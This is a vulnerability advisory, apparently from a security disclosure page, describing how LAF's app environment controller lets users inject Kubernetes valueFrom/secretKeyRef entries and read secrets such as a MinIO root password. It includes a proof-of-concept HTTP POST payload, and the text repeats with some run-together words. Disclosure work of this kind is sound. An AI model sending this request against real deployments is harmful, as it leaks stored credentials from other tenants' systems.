Summary
The control of LAF app enV is not strict enough, and in certain scenarios of privatization environment, it may lead to sensitive information leakage in secret and configmap.
Details
problem is at env crontroller and instance server 。
In ES6 syntax, if an obj directly references another obj, the name of the obj itself will be used as the key, and the entire object structure will be integrated intact.
When constructing the deployment instance of the app, env was found from the database and directly inserted into the template, resulting in controllability here.
Sensitive information in the secret and configmap can be read through the k8s envFrom field.
PoC
POST /v1/apps/fdk44h/environments HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 279
[
{
"name": "SERVER_SECRET",
"value": "xxxxxx"
},
{
"name": "HIHIHI",
"valueFrom": {
"secretKeyRef": {
"name": "minio",
"key": "rootPassword"
}
},
"value": ""
}
]Impact
In a privatization environment, when namespaceConf. fixed is marked, it may lead to the leakage of sensitive information in the system.
DVKunion Reporter
Summary
The control of LAF app enV is not strict enough, and in certain scenarios of privatization environment, it may lead to sensitive information leakage in
secretandconfigmap.Details
problem is at env crontroller and instance server 。
In ES6 syntax, if an obj directly references another obj, the name of the obj itself will be used as the key, and the entire object structure will be integrated intact.
When constructing the deployment instance of the app, env was found from the database and directly inserted into the template, resulting in controllability here.
Sensitive information in the secret and configmap can be read through the k8s envFrom field.
PoC
Impact
In a privatization environment, when
namespaceConf. fixedis marked, it may lead to the leakage of sensitive information in the system.